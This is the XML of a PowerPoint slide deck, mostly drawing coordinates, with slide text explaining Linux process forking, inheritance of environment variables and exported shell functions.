              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3174364" y="4567666"/>
              <a:ext cx="360" cy="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E8AA865-2141-D3AE-166A-597C350834F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65724" y="4559026"/>
                <a:ext cx="180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DF7F54D-78DF-8A3A-DFFB-331843358AEF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3178684" y="4646146"/>
              <a:ext cx="360" cy="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DF7F54D-78DF-8A3A-DFFB-331843358AE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169684" y="4637506"/>
                <a:ext cx="18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B5EEE1-D40A-5296-294A-8618369DCBD8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3178684" y="4685386"/>
              <a:ext cx="5040" cy="70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B5EEE1-D40A-5296-294A-8618369DCBD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69684" y="4676746"/>
                <a:ext cx="2268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98EA94D-5B53-B04D-4A08-99E4430FB46B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3186244" y="4787626"/>
              <a:ext cx="360" cy="27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98EA94D-5B53-B04D-4A08-99E4430FB46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77604" y="4778626"/>
                <a:ext cx="1800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3FC57AA9-A2D4-D940-C999-997E5C3F0FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3186244" y="4846306"/>
            <a:ext cx="12240" cy="191520"/>
            <a:chOff x="3186244" y="4846306"/>
            <a:chExt cx="1224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79BFA8F-9304-E43E-9555-DC0C6E836056}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3186244" y="4846306"/>
                <a:ext cx="360" cy="96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79BFA8F-9304-E43E-9555-DC0C6E8360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77604" y="4837666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BBE514-7176-A76F-AE2D-1A741ABAD839}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3186244" y="4952506"/>
                <a:ext cx="12240" cy="85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BBE514-7176-A76F-AE2D-1A741ABAD83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7604" y="4943506"/>
                  <a:ext cx="2988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D4D7F3F9-482A-AFD3-0589-9680EF55E6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3198124" y="5082106"/>
            <a:ext cx="35640" cy="177840"/>
            <a:chOff x="3198124" y="5082106"/>
            <a:chExt cx="3564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3EDC0C-E892-B72C-FD81-DC666005ECC5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3198124" y="5082106"/>
                <a:ext cx="360" cy="35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3EDC0C-E892-B72C-FD81-DC666005EC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89124" y="5073106"/>
                  <a:ext cx="18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F8A257-3BD7-EE43-7012-23D4812DDBBB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3198124" y="5128906"/>
                <a:ext cx="15480" cy="658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F8A257-3BD7-EE43-7012-23D4812DDB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89124" y="5119906"/>
                  <a:ext cx="33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83BF477-2FB1-4B3E-7B85-636A31A2C561}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3213964" y="5211346"/>
                <a:ext cx="19800" cy="486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83BF477-2FB1-4B3E-7B85-636A31A2C5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04964" y="5202706"/>
                  <a:ext cx="374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A444B8-8BD6-61A7-5E2F-C441FDC7C9CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3269044" y="5305666"/>
            <a:ext cx="140040" cy="91800"/>
            <a:chOff x="3269044" y="5305666"/>
            <a:chExt cx="140040" cy="9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3EA8CB-477C-6EBC-6E11-3FA748C5156A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3269044" y="5305666"/>
                <a:ext cx="54360" cy="3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3EA8CB-477C-6EBC-6E11-3FA748C515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60044" y="5296666"/>
                  <a:ext cx="720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D7FB8B-8EE4-0C28-58BA-C46E9E153008}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3359044" y="5364346"/>
                <a:ext cx="50040" cy="33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D7FB8B-8EE4-0C28-58BA-C46E9E15300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50044" y="5355706"/>
                  <a:ext cx="6768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8F4FC22-18EF-4CE6-6830-777B502005E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3539764" y="5438866"/>
            <a:ext cx="524160" cy="89280"/>
            <a:chOff x="3539764" y="5438866"/>
            <a:chExt cx="524160" cy="8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47D0D18-8553-D993-3908-4ABF97CED21F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3539764" y="5438866"/>
                <a:ext cx="143640" cy="27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47D0D18-8553-D993-3908-4ABF97CED2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30764" y="5430226"/>
                  <a:ext cx="1612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0676048-ECDA-C7A5-3F8E-7B16D5C1AB54}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3743524" y="5470546"/>
                <a:ext cx="136080" cy="26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0676048-ECDA-C7A5-3F8E-7B16D5C1AB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34884" y="5461546"/>
                  <a:ext cx="1537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4DC4C60-38DB-6208-3C59-BD85582994B6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3959524" y="5509426"/>
                <a:ext cx="104400" cy="1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4DC4C60-38DB-6208-3C59-BD85582994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50524" y="5500786"/>
                  <a:ext cx="12204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C33D06C-29E2-9449-1D6B-B17E0FE2B6C2}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4175164" y="5537146"/>
              <a:ext cx="213480" cy="82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C33D06C-29E2-9449-1D6B-B17E0FE2B6C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6524" y="5528506"/>
                <a:ext cx="2311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FA01F9-59C4-649D-1C6C-DBBC20AF5A7B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4493404" y="5549026"/>
              <a:ext cx="96120" cy="8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FA01F9-59C4-649D-1C6C-DBBC20AF5A7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84404" y="5540026"/>
                <a:ext cx="1137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E0C8A2C-4BB2-0C5F-BD10-EB8791FA646D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4732804" y="5560906"/>
              <a:ext cx="173520" cy="3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E0C8A2C-4BB2-0C5F-BD10-EB8791FA64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23804" y="5551906"/>
                <a:ext cx="191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EB6C7E5-E77B-CFB9-50C9-3116E8D94DBB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5011084" y="5559106"/>
              <a:ext cx="239760" cy="18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EB6C7E5-E77B-CFB9-50C9-3116E8D94DB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02444" y="5550466"/>
                <a:ext cx="2574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888CCFC-A5BB-F18F-75E5-B31EAE1B3AB8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5443084" y="5545066"/>
              <a:ext cx="262800" cy="36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888CCFC-A5BB-F18F-75E5-B31EAE1B3A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434084" y="5536066"/>
                <a:ext cx="280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231D8B7-40AC-11E8-15E1-8A0AF54A0AD0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5839444" y="5545066"/>
              <a:ext cx="23724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231D8B7-40AC-11E8-15E1-8A0AF54A0AD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30444" y="5536066"/>
                <a:ext cx="2548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E072F7A-C525-58D8-EFB6-7E1910F49172}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6219964" y="5545066"/>
              <a:ext cx="170280" cy="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E072F7A-C525-58D8-EFB6-7E1910F491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11324" y="5536066"/>
                <a:ext cx="1879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248DA28-E9E5-F52C-A8A7-AF8405CBF833}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6498604" y="5545066"/>
              <a:ext cx="20772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248DA28-E9E5-F52C-A8A7-AF8405CBF8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89604" y="5536066"/>
                <a:ext cx="2253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F42BF15-634B-E816-DBD1-66DEE9BB7E85}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6875524" y="5545066"/>
              <a:ext cx="165960" cy="28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F42BF15-634B-E816-DBD1-66DEE9BB7E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66524" y="5536066"/>
                <a:ext cx="183600" cy="2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6C65391F-CB80-ADE6-7C6A-4C86D3233442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7173604" y="5537146"/>
            <a:ext cx="456480" cy="15840"/>
            <a:chOff x="7173604" y="5537146"/>
            <a:chExt cx="456480" cy="1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4D79DB-B1BA-E1AB-2E65-6D88F255BA15}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7173604" y="5552626"/>
                <a:ext cx="1551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4D79DB-B1BA-E1AB-2E65-6D88F255BA1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64604" y="5543986"/>
                  <a:ext cx="17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8E3D4B7-EFEE-B998-9213-686F87D28BBC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7424884" y="5537146"/>
                <a:ext cx="20520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8E3D4B7-EFEE-B998-9213-686F87D28BB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5884" y="5528506"/>
                  <a:ext cx="222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B9A272C-D03A-0B4F-436E-613C3C3DED44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7829164" y="5460826"/>
            <a:ext cx="408240" cy="76680"/>
            <a:chOff x="7829164" y="5460826"/>
            <a:chExt cx="408240" cy="7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EB31EB5-9BA9-90C6-2A44-F7AD2C569CA0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7829164" y="5533186"/>
                <a:ext cx="1440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EB31EB5-9BA9-90C6-2A44-F7AD2C569C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20164" y="5524186"/>
                  <a:ext cx="3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57FA68-1E13-7B15-D336-EFB4955577E9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7856524" y="5533186"/>
                <a:ext cx="190440" cy="3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57FA68-1E13-7B15-D336-EFB4955577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47524" y="5524186"/>
                  <a:ext cx="208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1BD7A77-86F3-6994-5FD4-0056EFCAE05F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8064244" y="5537146"/>
                <a:ext cx="12204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1BD7A77-86F3-6994-5FD4-0056EFCAE05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55604" y="5528506"/>
                  <a:ext cx="13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7EEFEE-0E35-A140-6DFB-46EAC4A53DA6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8217604" y="5460826"/>
                <a:ext cx="19800" cy="6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7EEFEE-0E35-A140-6DFB-46EAC4A53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08604" y="5452186"/>
                  <a:ext cx="3744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B575BA8-3461-0674-DB3E-41BCBB793450}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8237044" y="5333386"/>
              <a:ext cx="360" cy="9000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B575BA8-3461-0674-DB3E-41BCBB79345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228404" y="5324746"/>
                <a:ext cx="180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9D2C950-3EE4-5DFF-E88A-A0A7E1FE89B7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8244964" y="5240866"/>
              <a:ext cx="6840" cy="37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9D2C950-3EE4-5DFF-E88A-A0A7E1FE89B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236324" y="5231866"/>
                <a:ext cx="24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F33437-1A00-4251-1ECA-3A3CAE6062BB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8256844" y="5055826"/>
              <a:ext cx="4320" cy="1324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F33437-1A00-4251-1ECA-3A3CAE6062B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248204" y="5047186"/>
                <a:ext cx="219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FD97981-EA5D-2EC0-88CE-37BB1202596D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8260804" y="4951066"/>
              <a:ext cx="4320" cy="3708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FD97981-EA5D-2EC0-88CE-37BB1202596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251804" y="4942066"/>
                <a:ext cx="21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F1C3594-0E42-27C9-FD14-ABF7D535DB0A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8268724" y="4802026"/>
              <a:ext cx="11880" cy="11124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F1C3594-0E42-27C9-FD14-ABF7D535DB0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259724" y="4793386"/>
                <a:ext cx="2952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219DBA70-5C10-5575-26E9-4DC474C296AD}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8163244" y="4722826"/>
              <a:ext cx="220320" cy="14796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219DBA70-5C10-5575-26E9-4DC474C296A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4244" y="4714186"/>
                <a:ext cx="23796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1027" name="TextBox 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE17D6DC-CA24-5480-AC34-FB5DABBA403D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5847269"/>
            <a:ext cx="1066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a new process gets spawned, it will inherit environment variables from its parent**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5C9FB81-AC70-4ABB-63DB-607D1E4E7D06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152455" y="644203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**some exceptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="👶🏻 Baby: Light Skin Tone Emoji on Apple iOS 10.2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB75C01-B6C3-3587-C57D-EB0A60291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148" y="1432466"/>
            <a:ext cx="970384" cy="970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48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053DBD-6269-F80F-556C-A1E8D548831D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1219200"/>
            <a:ext cx="1981200" cy="396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terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(parent process)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ED8294-E92E-1D16-2435-269876A94A06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="1600200"/>
            <a:ext cx="609600" cy="2971800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A8B55-F587-BF2A-4BAD-7A03FA036D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1877091" y="2827753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9BD18-8BC2-7B77-BE96-F46F396EA76A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="112121"/>
            <a:ext cx="898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Linux, all new processes are forked() from an existing process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="👨🏻 Man: Light Skin Tone Emoji on Apple iOS 10.2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431F53C0-9926-0D51-F6DF-5F37E53C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372472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879D19-A4D7-4631-16FB-48ADBCD6E408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7008753" y="296862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environment variables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4B79C7CC-33C4-97C0-5ADF-83C12E9711C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1543670"/>
            <a:ext cx="441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are in a shell, we can also define Shell functions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5A3CED6-BA6E-B9F0-E4DD-968B293186DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="2677180"/>
            <a:ext cx="6413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foo() { echo “hello world”; }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4361BD-C921-2143-1841-F51595464185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="3335890"/>
            <a:ext cx="457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we export this function, the shell function will also get passed onto future children of the parent </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270672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5567</TotalTime>
  <Words>2921</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>543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53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-21T16:55:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-08T20:44:52Z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